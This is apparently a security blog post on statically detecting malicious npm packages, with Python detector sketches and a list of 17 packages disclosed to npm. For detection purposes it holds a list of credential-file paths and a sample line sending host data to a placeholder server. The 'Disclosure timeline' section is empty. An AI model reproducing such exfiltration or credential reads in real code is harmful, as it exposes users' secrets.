Sep 4, 2019

Discovering Malicious Packages Published on npm

By Ming Yi Ang

Sightings of malicious packages on popular open source repositories (such as npm and RubyGems) have become increasingly common: just this year, there have been several reported incidents.

This method of attack is frighteningly effective given the widespread reach of popular packages, so we've started looking into ways to discover malicious packages to hopefully preempt such threats.

The problem

In November 2018, a malicious package named “flatmap-stream” was discovered as a transitive dependency of a popular library, “event-stream,” with 1.4 million weekly downloads. Here, the attacker gained publishing rights through social engineering, targeting a package that was not regularly maintained. The attacker published an updated version, “3.3.6,” adding malicious code to steal cryptocurrency. This went undetected for two to three months.

In a separate incident from June 2019, a malicious package “electron-native-notify” was discovered to be stealing sensitive information, such as cryptocurrency wallet seeds and other credentials. The attacker waited for the package to be consumed by another popular library before introducing malicious code into subsequent releases. This was also undetected for two to three months.

Detection of the problem

Malicious packages tend to exhibit a number of common patterns. To identify them, we reviewed a past research paper, “Static Detection of Application Backdoors,” and went through publicly reported incidents, which led to the following list.

Obfuscation

Malicious packages tend to hide payloads using encoding methods such as base64 and hex. Encoding and decoding APIs are typically used only by libraries that implement low-level protocols or provide utility functions, so finding them in other kinds of packages is a good indicator that a package may be malicious.
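
A minimal sketch of how such a check might look, written in Python for brevity. It is not the detector used in this analysis: the pattern list, the 40-character threshold, and the function name `find_obfuscation_hints` are assumptions made for illustration, and a regex scan is much cruder than a real static analysis.

```python
import re
from typing import List

# Illustrative (not exhaustive) patterns for decoding calls in JavaScript source.
DECODE_PATTERNS = [
    re.compile(r"""Buffer\.from\([^)]*,\s*['"](?:base64|hex)['"]\s*\)"""),
    re.compile(r"""\batob\s*\("""),
    re.compile(r"""\.toString\(\s*['"](?:base64|hex)['"]\s*\)"""),
]

# Long runs of base64 characters inside a string literal can hint at an
# embedded payload. The 40-character threshold is an arbitrary assumption.
LONG_BASE64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")


def find_obfuscation_hints(js_source: str) -> List[str]:
    """Return suspicious snippets found in the text of one JavaScript file."""
    hits = []
    for pattern in DECODE_PATTERNS:
        hits.extend(match.group(0) for match in pattern.finditer(js_source))
    hits.extend(match.group(1) for match in LONG_BASE64_LITERAL.finditer(js_source))
    return hits
```

A hit from a check like this is only a hint. Legitimate utility libraries use the same calls, so flagged packages still need manual review.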

Reading of sensitive information

Sensitive information is data from the environment that libraries should read only with good reason. This includes files like “/etc/shadow,” “~/.aws/credentials,” or SSH private keys.
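
One simple way to look for this pattern is to scan string literals for well-known sensitive paths. The sketch below is in Python and is only an illustration. The first two path fragments come from the examples above, the SSH key file names are assumed defaults, and the helper name `find_sensitive_reads` is hypothetical.

```python
import re
from typing import List

# Illustrative list. The first two entries come from the examples in the text;
# the SSH key file names are assumed common defaults.
SENSITIVE_PATH_FRAGMENTS = [
    "/etc/shadow",
    ".aws/credentials",
    ".ssh/id_rsa",
    ".ssh/id_ed25519",
]

# Rough approximation of a JavaScript string literal (single, double, or
# backtick quoted, on one line). A real analysis would use a parser instead.
STRING_LITERAL = re.compile(r"""(['"`])((?:\\.|(?!\1).)*)\1""")


def find_sensitive_reads(js_source: str) -> List[str]:
    """Return string literals that mention a sensitive path fragment."""
    hits = []
    for match in STRING_LITERAL.finditer(js_source):
        literal = match.group(2)
        if any(fragment in literal for fragment in SENSITIVE_PATH_FRAGMENTS):
            hits.append(literal)
    return hits
```

Paths assembled at runtime from several pieces would slip past a literal scan like this one, which is one reason to combine it with the other patterns.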

Exfiltration of information

Libraries are unlikely to contact hardcoded external servers; this is something more commonly done in downstream applications. Malicious libraries tend to do this to exfiltrate information, so we look for such occurrences.
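
As a rough illustration, hardcoded servers can be surfaced by collecting URL-like string literals and listing their hosts. The analysis described later in this post works on abstract syntax trees. The Python sketch below swaps in a plain regular expression over the source text as a simplified stand-in, and the function name `find_hardcoded_hosts` and the example host are hypothetical.

```python
import re
from typing import List
from urllib.parse import urlparse

# Matches an http(s) URL at the start of a quoted JavaScript string literal.
# This is a simplification: it works on raw text, not on a parsed AST.
URL_LITERAL = re.compile(r"""['"`](https?://[^'"`\s]+)['"`]""")


def find_hardcoded_hosts(js_source: str) -> List[str]:
    """Return the distinct hosts of URL literals, in order of first appearance."""
    hosts = []
    for match in URL_LITERAL.finditer(js_source):
        host = urlparse(match.group(1)).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


# Hypothetical input; "collector.example" is a placeholder host.
sample = 'http.get("http://collector.example/upload?h=" + os.hostname());'
print(find_hardcoded_hosts(sample))
```

The resulting host list still needs filtering, since many libraries legitimately reference documentation or API endpoints.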

Remote code execution

A pre-install or post-install script is a convenient way of running arbitrary code on a victim's machine. Payloads may also be downloaded from external sources.
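
Install hooks are declared in the "scripts" section of a package's package.json, so they are easy to list. The following Python sketch shows one way to do that, assuming the manifest text has already been read from disk. The function name `find_install_scripts` and the sample manifest are hypothetical.

```python
import json
from typing import Dict

# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def find_install_scripts(package_json_text: str) -> Dict[str, str]:
    """Return the install-time scripts declared in a package.json document."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    if not isinstance(scripts, dict):
        return {}
    return {name: command for name, command in scripts.items()
            if name in INSTALL_HOOKS}


# Hypothetical manifest for illustration only.
sample = '{"name": "demo", "scripts": {"test": "mocha", "postinstall": "node ./test/setup.js"}}'
print(find_install_scripts(sample))
```

Many legitimate packages use these hooks to compile native code, so the commands they run matter more than the mere presence of a hook.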

Typo-squatting

While typo-squatted packages are not always malicious, they are a red flag. We treat typo-squatted packages as malicious, since they may provide the exact same functionality and interface as the package they imitate, and may introduce a payload later, once other popular packages have come to depend on them.

Implementation of a detector for malicious packages

To find malicious packages in the wild, we wrote specific, lightweight static analyses for each pattern and ran them over our dataset of npm packages, looking for packages flagged by one or more detectors. False positives were expected; the plan was to narrow the number of candidates to the point where manual verification was feasible.

Two example analyses:

  • To find hardcoded external URLs, we extracted URL-like string literals from the abstract syntax trees of JavaScript source files.
  • To detect typo-squatting, we looked for package names within a Levenshtein distance of 2 of the name of any of the top 1000 packages, e.g., “mogobd” vs. “mongodb.”
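
The name comparison in the second example can be sketched as follows, in Python. This is a textbook dynamic-programming implementation of plain Levenshtein distance, not the code used for the analysis. The function names and the short list of popular names in the usage are assumptions for illustration.

```python
from typing import Iterable, List, Tuple


def levenshtein(a: str, b: str) -> int:
    """Plain Levenshtein distance (insertions, deletions, substitutions)."""
    if len(a) < len(b):
        a, b = b, a  # keep the shorter string in the inner loop
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            cost = 0 if char_a == char_b else 1
            current.append(min(previous[j] + 1,          # deletion
                               current[j - 1] + 1,       # insertion
                               previous[j - 1] + cost))  # substitution
        previous = current
    return previous[-1]


def find_typosquat_targets(candidate: str, popular_names: Iterable[str],
                           max_distance: int = 2) -> List[Tuple[str, int]]:
    """Return (popular name, distance) pairs within max_distance of candidate."""
    matches = []
    for name in popular_names:
        if name == candidate:
            continue  # the popular package itself is not a typo-squat
        distance = levenshtein(candidate, name)
        if distance <= max_distance:
            matches.append((name, distance))
    return matches


# Hypothetical stand-in for a top-1000 list.
print(find_typosquat_targets("mogodb", ["mongodb", "express", "lodash"]))
```

One design point: plain Levenshtein distance counts a swap of two adjacent letters as two edits, so this sketch scores “mogobd” vs. “mongodb” as 3, while a transposition-aware variant such as Damerau-Levenshtein would score it as 2. A detector meant to catch swapped letters may prefer the latter.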

We ran these only on the latest versions of packages.

Results

The full analysis took less than a day and uncovered 17 new malicious packages:

* axioss

* axios-http

* body-parse-xml

* sparkies

* js-regular

* file-logging

* mysql-koa

* import-mysql

* mogodb

* mogobd

* mogoose

* mogodb-core

* node-ftp

* serializes

* serilize

* koa-body-parse

* node-spdy

We disclosed these malicious packages to the npm security team, and they were yanked from the registry.

Most of the malicious packages above disguise their payloads as a “test” and use pre-install, post-install, or test scripts to exfiltrate information. For example, “node-ftp” exposes the victim's host information by sending the values of “os.hostname()”, “os.type()”, “os.uptime()”, and “os.tmpdir()” to its server at “arnoxia.cn”.

Disclosure timeline

The disclosure timeline was as follows:

Conclusion

Finding these previously undetected malicious packages confirmed our suspicion that harmful libraries are circulating in the open, and it is only the beginning of our effort to leave no stone unturned in reducing such threats. To that end, we intend to perform more regular, automated, and thorough audits of public packages, and then generalize these techniques to other package managers such as RubyGems.

By Ming Yi Ang

Ming is a security researcher who is passionate about building security automation tools that aid the discovery of security issues. Using findings from these tools, he has contributed to various open-source projects by responsibly disclosing the vulnerabilities he encounters in his research.